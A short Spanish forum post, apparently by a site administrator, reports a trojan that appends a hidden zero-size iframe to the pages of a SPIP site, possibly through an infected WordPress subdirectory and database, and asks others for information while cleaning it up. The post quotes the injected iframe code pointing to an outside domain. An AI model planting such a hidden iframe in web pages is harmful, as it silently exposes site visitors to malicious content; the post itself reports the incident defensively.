Hola.
En uno de los sitios con spip se ha colado un troyano que crea este frame al final de la página:
<html><body><iframe src="http://mumukafes.net/trf/index.php" width="0" height="0" frameborder="0"></iframe></body></html>
En principio podría ser por un subdirectorio donde tienen montado un wordpress ya que está sufriendo un ataque de este tipo estos días ()
Pero como se ha metido en su base de datos y trabaja sobre el dominio principal infecta todas las páginas incuidas las de spip.
Estoy trabajando para limpiarlo, pero si alguien tiene más información sería bueno conocerla.
Si no os sale el mensajito de software con sitio malicioso en vuestras webs tranquis que no tenéis problema.
Un saludo.